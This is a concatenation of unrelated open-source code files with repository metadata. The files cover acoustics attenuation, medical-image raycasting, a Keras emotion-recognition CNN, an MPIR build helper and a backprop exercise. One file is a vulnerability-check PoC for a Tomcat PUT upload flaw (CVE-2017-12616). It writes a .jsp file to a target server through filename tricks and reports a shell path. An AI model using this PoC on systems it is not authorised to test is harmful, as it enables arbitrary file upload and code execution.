.. autofunction:: acoustics.standards.iso_9613_1_1993.relaxation_frequency_oxygen
.. autofunction:: acoustics.standards.iso_9613_1_1993.attenuation_coefficient
"""
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
import acoustics
from acoustics.standards.iso_9613_1_1993 import *
class Atmosphere(object):
"""
Class describing atmospheric conditions.
"""
REF_TEMP = 293.15
"""Reference temperature"""
REF_PRESSURE = 101.325
"""International Standard Atmosphere in kilopascal"""
TRIPLE_TEMP = 273.16
"""Triple point isotherm temperature."""
def __init__(self,
temperature=REFERENCE_TEMPERATURE,
pressure=REFERENCE_PRESSURE,
relative_humidity=0.0,
reference_temperature=REFERENCE_TEMPERATURE,
reference_pressure=REFERENCE_PRESSURE,
triple_temperature=TRIPLE_TEMPERATURE):
"""
:param temperature: Temperature in kelvin
:param pressure: Pressure
:param relative_humidity: Relative humidity
:param reference_temperature: Reference temperature.
:param reference_pressure: Reference pressure.
:param triple_temperature: Triple temperature.
"""
self.temperature = temperature
"""Ambient temperature :math:`T`."""
self.pressure = pressure
"""Ambient pressure :math:`p_a`."""
self.relative_humidity = relative_humidity
"""Relative humidity"""
self.reference_temperature = reference_temperature
"""
Reference temperature.
"""
self.reference_pressure = reference_pressure
"""
Reference pressure.
"""
self.triple_temperature = triple_temperature
"""
Triple temperature.
"""
def __repr__(self):
return "Atmosphere{}".format(self.__str__())
def __str__(self):
return "(temperature={}, pressure={}, relative_humidity={}, " \
"reference_temperature={}, reference_pressure={}, " \
"triple_temperature={})".format(self.temperature, self.pressure,
self.relative_humidity,
self.reference_temperature,
self.reference_pressure,
self.triple_temperature)
def __eq__(self, other):
return self.__dict__ == other.__dict__ and self.__class__ == other.__class__
@property
def soundspeed(self):
"""
Speed of sound :math:`c`.
The speed of sound is calculated using :func:`acoustics.standards.iso_9613_1_1993.soundspeed`.
"""
return soundspeed(self.temperature, self.reference_temperature)
@property
def saturation_pressure(self):
"""
Saturation pressure :math:`p_{sat}`.
The saturation pressure is calculated using :func:`acoustics.standards.iso_9613_1_1993.saturation_pressure`.
"""
return saturation_pressure(self.temperature, self.reference_pressure, self.triple_temperature)
@property
def molar_concentration_water_vapour(self):
"""
Molar concentration of water vapour :math:`h`.
The molar concentration of water vapour is calculated using :func:`acoustics.standards.iso_9613_1_1993.molar_concentration_water_vapour`.
"""
return molar_concentration_water_vapour(self.relative_humidity, self.saturation_pressure, self.pressure)
@property
def relaxation_frequency_nitrogen(self):
"""
Resonance frequency of nitrogen :math:`f_{r,N}`.
The resonance frequency is calculated using :func:`acoustics.standards.iso_9613_1_1993.relaxation_frequency_nitrogen`.
"""
return relaxation_frequency_nitrogen(self.pressure, self.temperature, self.molar_concentration_water_vapour, self.reference_pressure, self.reference_temperature)
@property
def relaxation_frequency_oxygen(self):
"""
Resonance frequency of oxygen :math:`f_{r,O}`.
The resonance frequency is calculated using :func:`acoustics.standards.iso_9613_1_1993.relaxation_frequency_oxygen`.
"""
return relaxation_frequency_oxygen(self.pressure, self.molar_concentration_water_vapour, self.reference_pressure)
def attenuation_coefficient(self, frequency):
"""
Attenuation coefficient :math:`\\alpha` describing atmospheric absorption in dB/m as function of ``frequency``.
:param frequency: Frequencies to be considered.
The attenuation coefficient is calculated using :func:`acoustics.standards.iso_9613_1_1993.attenuation_coefficient`.
"""
return attenuation_coefficient(self.pressure, self.temperature, self.reference_pressure, self.reference_temperature, self.relaxation_frequency_nitrogen, self.relaxation_frequency_oxygen, frequency)
def frequency_response(self, distance, frequencies, inverse=False):
"""Frequency response.
:param distance: Distance between source and receiver.
:param frequencies: Frequencies for which to compute the response.
:param inverse: Whether the attenuation should be undone.
"""
return frequency_response(self, distance, frequencies, inverse)
def impulse_response(self, distance, fs, ntaps=None, inverse=False):
"""Impulse response of sound travelling through `atmosphere` for a given `distance` sampled at `fs`.
:param atmosphere: Atmosphere.
:param distance: Distance between source and receiver.
:param fs: Sample frequency
:param ntaps: Amount of taps.
:param inverse: Whether the attenuation should be undone.
.. seealso:: :func:`impulse_response`
"""
return impulse_response(self, distance, fs, ntaps, inverse)
def plot_attenuation_coefficient(self, frequency):
"""
Plot the attenuation coefficient :math:`\\alpha` as function of frequency and write the figure to ``filename``.
:param filename: Filename
:param frequency: Frequencies
.. note:: The attenuation coefficient is plotted in dB/km!
"""
fig = plt.figure()
ax0 = fig.add_subplot(111)
ax0.plot(frequency, self.attenuation_coefficient(frequency)*1000.0)
ax0.set_xscale('log')
ax0.set_yscale('log')
ax0.set_xlabel(r'$f$ in Hz')
ax0.set_ylabel(r'$\alpha$ in dB/km')
ax0.legend()
return fig
def frequency_response(atmosphere, distance, frequencies, inverse=False):
"""Single-sided frequency response.
:param atmosphere: Atmosphere.
:param distance: Distance between source and receiver.
:param frequencies: Frequencies for which to compute the response.
:param inverse: Whether the attenuation should be undone.
"""
sign = +1 if inverse else -1
tf = 10.0**( float(sign) * distance * atmosphere.attenuation_coefficient(frequencies) / 20.0 )
return tf
def impulse_response(atmosphere, distance, fs, ntaps, inverse=False):
"""Impulse response of sound travelling through `atmosphere` for a given `distance` sampled at `fs`.
:param atmosphere: Atmosphere.
:param distance: Distance between source and receiver.
:param fs: Sample frequency
:param ntaps: Amount of taps.
:param inverse: Whether the attenuation should be undone.
The attenuation is calculated for a set of positive frequencies. Because the attenuation is the same for the negative frequencies, we have Hermitian symmetry.
The attenuation is entirely real-valued. We like to have a constant group delay and therefore we need a linear-phase filter.
This function creates a zero-phase filter, which is the special case of a linear-phase filter with zero phase slope.
The type of filter is non-causal.
The impulse response of the filter is made causal by rotating it by M/2 samples and discarding the imaginary parts.
A real, even impulse response corresponds to a real, even frequency response.
"""
# Frequencies vector with positive frequencies only.
frequencies = np.fft.rfftfreq(ntaps, 1./fs)
# Single-sided spectrum. Negative frequencies have the same values.
tf = frequency_response(atmosphere, distance, frequencies, inverse)
# Impulse response. We design a zero-phase filter (linear-phase with zero slope).
# We need to shift the IR to make it even. Taking the real part should not be necessary, see above.
#ir = np.fft.ifftshift(np.fft.irfft(tf, n=ntaps)).real
ir = acoustics.signal.impulse_response_real_even(tf, ntaps=ntaps)
return ir
__all__ = ['Atmosphere', 'SOUNDSPEED', 'REFERENCE_TEMPERATURE',
'REFERENCE_TEMPERATURE', 'TRIPLE_TEMPERATURE',
'soundspeed', 'saturation_pressure',
'molar_concentration_water_vapour',
'relaxation_frequency_oxygen',
'relaxation_frequency_nitrogen',
'attenuation_coefficient',
'impulse_response',
'frequency_response'
]
| [
"kejzin@gmail.com"
] | kejzin@gmail.com |
85c0339de8aef3f58ff161db5ea598675a6d7713 | 09cdc41b2a080a6f12e2a5042e44f6070b65816b | /Raycast.py | c60bf7dad4acc548975beed89e8da6e76afe4bb9 | [] | no_license | lameski123/spine_registration | dd9bff81010fa36c7c2631acdee30095f48c32be | 761801f116a5b1d0baf033b109f387327d68e1eb | refs/heads/main | 2023-08-17T23:46:26.533663 | 2021-09-15T20:02:58 | 2021-09-15T20:02:58 | 330,981,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,729 | py | import imfusion
import numpy as np
def raycast(image, rays):
for i in range(image.shape[1]):
for j in range(image.shape[0]):
if image[j, i] != 0:
rays[j, i] = 1
break
return rays
def multi_raycast(image, rays):
uni = np.unique(image)
# # print(uni)
uni = np.delete(uni, 0)
# the index in image.shape[] changes according to image positioninig. First check Imfusion then change indexes
for u in uni:
for i in range(image.shape[1]):
for j in range(image.shape[0]):
if image[j, i] == u:
rays[j, i] = u
break
return rays
def blur(a):
kernel = np.array([[1.0,2.0,1.0], [2.0,4.0,2.0], [1.0,2.0,1.0]])
kernel = kernel / np.sum(kernel)
arraylist = []
for y in range(3):
temparray = np.copy(a)
temparray = np.roll(temparray, y - 1, axis=0)
for x in range(3):
temparray_X = np.copy(temparray)
temparray_X = np.roll(temparray_X, x - 1, axis=1)*kernel[y,x]
arraylist.append(temparray_X)
arraylist = np.array(arraylist)
arraylist_sum = np.sum(arraylist, axis=0)
return arraylist_sum
class RayCast(imfusion.Algorithm):
def __init__(self, data):
super().__init__()
self.imageset = data
self.imageset_out = imfusion.SharedImageSet()
# self.axis = data[1]
@classmethod
def convert_input(cls, data):
# if len(data) == 1 and isinstance(data[0], imfusion.SharedImageSet):
# return data
# raise RuntimeError('Requires exactly one image')
return data
def compute(self):
# clear output of previous runs
self.imageset_out.clear()
# compute the thresholding on each individual image in the set
for image in self.imageset:
# print(image.size())
arr = np.squeeze(np.array(image)) # creates a copy
rays = np.zeros_like(np.squeeze(arr)) #empty image
#the index in arr.shape[] and the dimension that we iterate on K
#changes according to image positioninig. First check Imfusion then change indexes
print(arr.shape)
for k in range(arr.shape[0]):
rays[k,:,:] = raycast(arr[k,:,:], rays[k,:,:]) #assign the rays
#assign the spacing and the transform matrix
image_out = imfusion.SharedImage(np.expand_dims(rays, axis=-1))
image_out.spacing = image.spacing
image_out.matrix = image.matrix
self.imageset_out.add(image_out)
def output(self):
return [self.imageset_out]
imfusion.registerAlgorithm('Raycast', RayCast) | [
"jane.lameski96@gmail.com"
] | jane.lameski96@gmail.com |
c4c16a9d18247fc0618fd0cc14b6c52da311ea20 | 99d4558fcdfe787f950a687d4a06505274e17252 | /VGGNet.py | 5dab1a725f0a2a4a8424f97e1c6a53e424f0c6b4 | [
"BSD-3-Clause"
] | permissive | LHQ0308/EmotionClassification_FER2013 | 8ea0085036b3cd78e844572987a2e8a690c8e69b | 29bda4caaea26b40f75aae253ec292eb846a93df | refs/heads/master | 2020-04-24T13:58:39.912967 | 2018-08-06T16:44:06 | 2018-08-06T16:44:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,127 | py | """
" License:
" -----------------------------------------------------------------------------
" Copyright (c) 2018, Ratnajit Mukherjee.
" All rights reserved.
"
" Redistribution and use in source and binary forms, with or without
" modification, are permitted provided that the following conditions are met:
"
" 1. Redistributions of source code must retain the above copyright notice,
" this list of conditions and the following disclaimer.
"
" 2. Redistributions in binary form must reproduce the above copyright notice,
" this list of conditions and the following disclaimer in the documentation
" and/or other materials provided with the distribution.
"
" 3. Neither the name of the copyright holder nor the names of its contributors
" may be used to endorse or promote products derived from this software
" without specific prior written permission.
"
" THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
" ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
" LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
" CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
" SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
" INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
" CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
" ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
" POSSIBILITY OF SUCH DAMAGE.
" -----------------------------------------------------------------------------
"
" Description: A VGG like network to extract facial expressions from the FER 2013 dataset and learn
6 primary emotions (NOTE: we are merging 'anger' and 'disgust' into a single dataset
due to lack of examples
====================================================================================
Network Description:
1) 8 Convolution layers (grouped as 2 x 4)
2) 4 Maxpool layers
3) 2 Densely connected layers
4) 1 output layer with 6 classes
====================================================================================
" Author: Ratnajit Mukherjee, ratnajitmukherjee@gmail.com
" Date: July 2018
"""
# various imports to build the Neural Net
from keras.layers import Conv2D, Dense, Flatten, Dropout, BatchNormalization, MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.utils import plot_model
from keras.models import Sequential
from keras import backend as K
import argparse
import numpy as np
def Emonet(num_classes):
# use sequential model to build a VGG like network
emonet = Sequential()
"""
Convolution and Maxpool layers: Block 1
"""
# Conv Layer 1:48x48x32
emonet.add(Conv2D(filters=32, kernel_size=3, padding='same', activation='linear', input_shape=(48, 48, 1)))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 2:48x48x32
emonet.add(Conv2D(filters=32, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 1
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.3))
"""
Convolution and Maxpool layers: Block 2
"""
# Conv Layer 3:24x24x64
emonet.add(Conv2D(filters=64, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 4:24x24x64
emonet.add(Conv2D(filters=64, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 2
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.3))
"""
Convolution and Maxpool layers: Block 3
"""
# Conv Layer 5:12x12x128
emonet.add(Conv2D(filters=128, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 6:12x12x128
emonet.add(Conv2D(filters=128, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 3
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.25))
"""
Convolution and Maxpool layers: Block 4
"""
# Conv Layer 7:6x6x256
emonet.add(Conv2D(filters=256, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 8:6x6x256
emonet.add(Conv2D(filters=256, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 4
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.25))
# Flatten
emonet.add(Flatten())
# Dense layer 1:
emonet.add(Dense(256, activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
emonet.add(Dropout(0.5))
# Dense layer 2:
emonet.add(Dense(256, activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
emonet.add(Dropout(0.5))
# Output layer
emonet.add(Dense(num_classes, activation='softmax'))
trainable_count = int(
np.sum([K.count_params(p) for p in set(emonet.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(emonet.non_trainable_weights)]))
# network summary
print('\n\n---<summary>---')
print('\n Layers: \n\tConvolution2D: {0}\n\tMaxPooling2D: {1}\n\tFully Connected Layers: {2}'.format(8, 4, 2))
print('\n Total params: {:,}'.format(trainable_count + non_trainable_count))
print('\n Trainable params: {:,}'.format(trainable_count))
print('\n Non-trainable params: {:,}'.format(non_trainable_count))
print('\n\n---</summary>---')
return emonet
def Emonet_extend(num_classes):
"""
This model is optional and bigger than the previous one. Practically, this model is less useful than the first one
therefore is not called by the application. Use only for experimental purposes
"""
emonet = Sequential()
"""
Convolution and Maxpool layers: Block 1
"""
# Conv Layer 1:48x48x32
emonet.add(Conv2D(filters=64, kernel_size=3, padding='same', activation='linear', input_shape=(48, 48, 1)))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 2:48x48x32
emonet.add(Conv2D(filters=64, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 1
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.2))
"""
Convolution and Maxpool layers: Block 2
"""
# Conv Layer 3:24x24x64
emonet.add(Conv2D(filters=128, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 4:24x24x64
emonet.add(Conv2D(filters=128, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 5:24x24x64
emonet.add(Conv2D(filters=128, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 2
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.2))
"""
Convolution and Maxpool layers: Block 3
"""
# Conv Layer 6:12x12x256
emonet.add(Conv2D(filters=256, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 7:12x12x256
emonet.add(Conv2D(filters=256, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 8:12x12x256
emonet.add(Conv2D(filters=256, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 9:12x12x256
emonet.add(Conv2D(filters=256, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 3
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.3))
"""
Convolution and Maxpool layers: Block 4
"""
# Conv Layer 9:6x6x256
emonet.add(Conv2D(filters=512, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 10:6x6x256
emonet.add(Conv2D(filters=512, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 11:6x6x256
emonet.add(Conv2D(filters=512, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# Conv Layer 12:6x6x256
emonet.add(Conv2D(filters=512, kernel_size=3, padding='same', activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
# MaxPool layer: 4
emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
emonet.add(Dropout(0.2))
# Flatten
emonet.add(Flatten())
# Dense layer 1:
emonet.add(Dense(2048, activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
emonet.add(Dropout(0.5))
# Dense layer 2:
emonet.add(Dense(2048, activation='linear'))
emonet.add(LeakyReLU(alpha=0.3))
emonet.add(BatchNormalization(axis=-1))
emonet.add(Dropout(0.5))
# Output layer
emonet.add(Dense(num_classes, activation='softmax'))
trainable_count = int(
np.sum([K.count_params(p) for p in set(emonet.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(emonet.non_trainable_weights)]))
# network summary
print('\n\n---<summary>---')
print('\n Layers: \n\tConvolution2D: {0}\n\tMaxPooling2D: {1}\n\tFully Connected Layers: {2}'.format(8, 4, 2))
print('\n Total params: {:,}'.format(trainable_count + non_trainable_count))
print('\n Trainable params: {:,}'.format(trainable_count))
print('\n Non-trainable params: {:,}'.format(non_trainable_count))
print('\n\n---</summary>---')
return emonet
"""
Using a main function for testing individual modules
Uncomment for testing purposes
Comment when testing is successful
"""
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--num_emotions", help="Number of emotions in the output layer of the VGG like NN",
type=int, default=7, required=True)
parser.add_argument("-o", "--out_img", type=str, help="Output path to dump the Network Architecture")
args = parser.parse_args()
num_emotions = args.num_emotions
out_img_path = args.out_img
if num_emotions is not 6 and num_emotions is not 7:
print("\n Number of emotions options are: \n 6 (for merging anger and disgust) "
"OR \n 7 (for all the emotions in the dataset")
exit(0)
else:
emonet = Emonet(num_classes=num_emotions)
emonet.summary()
if out_img_path is not None:
plot_model(model=emonet, to_file=out_img_path, show_shapes=True, show_layer_names=True)
| [
"ratnajitmukherjee@gmail.com"
] | ratnajitmukherjee@gmail.com |
e5fb1f72e9850b7e778c6e302a06e49f892d630d | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /system/tomcat/tomcat_put_exec.py | 5d95b87eb442bce192ffbb30043ed14ef2a86d4f | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Tomcat代码执行漏洞(CVE-2017-12616)
referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
author: Lucifer
description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
'''
import sys
import time
import hashlib
import requests
import datetime
import warnings
from termcolor import cprint
class tomcat_put_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
post_data = "thisisashell"
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp/"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
testVuln.run()
| [
"wangxinyu@vackbot.com"
] | wangxinyu@vackbot.com |
f2c796ddb9f18a239749ee30bb1004db5eba1baf | 5b4da825e536f570a464ae9f5d7f377fc16e12b7 | /externals/mpir-3.0.0/build.vc/_msvc_filters.py | 157096464eebc2a0cc84e80577c608dc607e2a80 | [
"LGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LGPL-2.1-or-later",
"GPL-2.0-only",
"LGPL-3.0-only",
"GPL-3.0-only",
"LGPL-2.1-only",
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | permissive | JaminChan/eos_win | 9ecb3fe7d1fbb52340e7b8df42b2d3d6695930a6 | c03e57151cfe152d0d3120abb13226f4df74f37e | refs/heads/master | 2020-03-24T20:38:49.539494 | 2018-09-06T10:13:16 | 2018-09-06T10:13:16 | 142,989,586 | 0 | 0 | MIT | 2018-09-04T06:49:10 | 2018-07-31T09:02:44 | C++ | UTF-8 | Python | false | false | 2,575 | py | # generate Visual Studio IDE Filter
from os import makedirs
from os.path import dirname, normpath, join, split, relpath
from errno import EEXIST
def filter_folders(cf_list, af_list, outf):
f1 = r''' <ItemGroup>
<Filter Include="Header Files" />
<Filter Include="Source Files" />
'''
f2 = r''' <Filter Include="Source Files\{0:s}" />
'''
f3 = r''' </ItemGroup>
'''
c_dirs = set(i[2] for i in cf_list)
a_dirs = set(i[2] for i in af_list)
if a_dirs:
c_dirs |= set((r'mpn\yasm',))
outf.write(f1)
for d in sorted(c_dirs):
if d:
t = d if d != r'mpn\generic' else r'mpn'
outf.write(f2.format(t))
outf.write(f3)
def filter_headers(hdr_list, relp, outf):
f1 = r''' <ItemGroup>
'''
f2 = r''' <ClInclude Include="{}{}">
<Filter>Header Files</Filter>
</ClInclude>
'''
f3 = r''' </ItemGroup>
'''
outf.write(f1)
for h in hdr_list:
outf.write(f2.format(relp, h))
outf.write(f3)
def filter_csrc(cf_list, relp, outf):
f1 = r''' <ItemGroup>
'''
f2 = r''' <ClCompile Include="{}{}">
<Filter>Source Files</Filter>
</ClCompile>
'''
f3 = r''' <ClCompile Include="{}{}\{}">
<Filter>Source Files\{}</Filter>
</ClCompile>
'''
f4 = r''' </ItemGroup>
'''
outf.write(f1)
for i in cf_list:
if not i[2]:
outf.write(f2.format(relp, i[0] + i[1]))
else:
t = 'mpn' if i[2].endswith('generic') else i[2]
outf.write(f3.format(relp, i[2], i[0] + i[1], t))
outf.write(f4)
def filter_asrc(af_list, relp, outf):
f1 = r''' <ItemGroup>
'''
f2 = r''' <YASM Include="{0:s}{2:s}\{1:s}">
<Filter>Source Files\mpn\yasm</Filter>
</YASM>
'''
f3 = r''' </ItemGroup>
'''
outf.write(f1)
for i in af_list:
outf.write(f2.format(relp, i[0] + i[1], i[2], i[2]))
outf.write(f3)
def gen_filter(path, root_dir, hf_list, cf_list, af_list, tools_ver):
f1 = r'''<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="{0}" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
'''.format(tools_ver)
f2 = r''' <ItemGroup>
<None Include="..\..\gmp-h.in" />
</ItemGroup>
</Project>
'''
relp = split(relpath(root_dir, path))[0] + '\\'
try:
makedirs(split(path)[0])
except IOError as e:
if e.errno != EEXIST:
raise
else:
pass
with open(path, 'w') as outf:
outf.write(f1)
filter_folders(cf_list, af_list, outf)
if hf_list:
filter_headers(hf_list, relp, outf)
filter_csrc(cf_list, relp, outf)
if af_list:
filter_asrc(af_list, relp, outf)
outf.write(f2)
| [
"349683504@qq.com"
] | 349683504@qq.com |
b9a8e6a1e4bfebb2091a2ec6418f80fb1a3ea0f5 | 241da0606773b46c9f9f1ccdf345373709cbe98a | /backprop/backprop.py | 1fc27127c15f400184f09106bc97eb9e55b419ff | [] | no_license | farshadsafavi/DeepLearning | 86491f47218df2d61d38326370cf2a1e3204f367 | 880ed5ed1eeabc5946b0946fedf40575f8f2df4e | refs/heads/master | 2020-05-28T07:07:48.370798 | 2019-06-01T22:19:57 | 2019-06-01T22:19:57 | 188,916,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,331 | py | import numpy as np
def sigmoid(x):
"""
Calculate sigmoid
"""
return 1 / (1 + np.exp(-x))
x = np.array([0.5, 0.1, -0.2])
target = 0.6
learnrate = 0.5
weights_input_hidden = np.array([[0.5, -0.6],
[0.1, -0.2],
[0.1, 0.7]])
weights_hidden_output = np.array([0.1, -0.3])
## Forward pass
hidden_layer_input = np.dot(x, weights_input_hidden)
hidden_layer_output = sigmoid(hidden_layer_input)
output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)
output = sigmoid(output_layer_in)
## Backwards pass
## TODO: Calculate output error
error = target - output
# TODO: Calculate error term for output layer
output_error_term = error*(output)*(1 - output)
# TODO: Calculate error term for hidden layer
hidden_error_term = np.dot(output_error_term, weights_hidden_output)*hidden_layer_output*(1-hidden_layer_output)
# TODO: Calculate change in weights for hidden layer to output layer
delta_w_h_o = learnrate * output_error_term * hidden_layer_output
# TODO: Calculate change in weights for input layer to hidden layer
delta_w_i_h = learnrate * hidden_error_term * x[:, None]
print('Change in weights for hidden layer to output layer:')
print(delta_w_h_o)
print('Change in weights for input layer to hidden layer:')
print(delta_w_i_h)
| [
"farshadtom2003@gmail.com"
] | farshadtom2003@gmail.com |
99d4e37e0d66355af8f0a5232e0a8b75df8ecdd0 | 4539b71e48ec47526f7f3834098e491383096fcd | /DemoUIonly-PythonQt/chap14matplotlib/Demo14_2Detail/myMainWindow.py | d7a681172d064cd1507c14f78d451967de8ba6bb | [] | no_license | likeke201/qt_code | e4d5ae8894153ae7a92e4ffdc01612c0aeb7510b | e0244558764bbbcc3646e828a907cdb1cdee6225 | refs/heads/master | 2022-12-06T11:23:38.068457 | 2020-08-30T05:16:12 | 2020-08-30T05:16:12 | 291,404,725 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,229 | py | # -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow,
QSplitter, QColorDialog, QLabel, QComboBox)
from PyQt5.QtCore import pyqtSlot,Qt
from PyQt5.QtGui import QColor
import numpy as np
import matplotlib as mpl
import matplotlib.style as mplStyle #一个模块
from matplotlib.backends.backend_qt5agg import (FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
from ui_MainWindow import Ui_MainWindow
class QmyMainWindow(QMainWindow):
def __init__(self, parent=None):
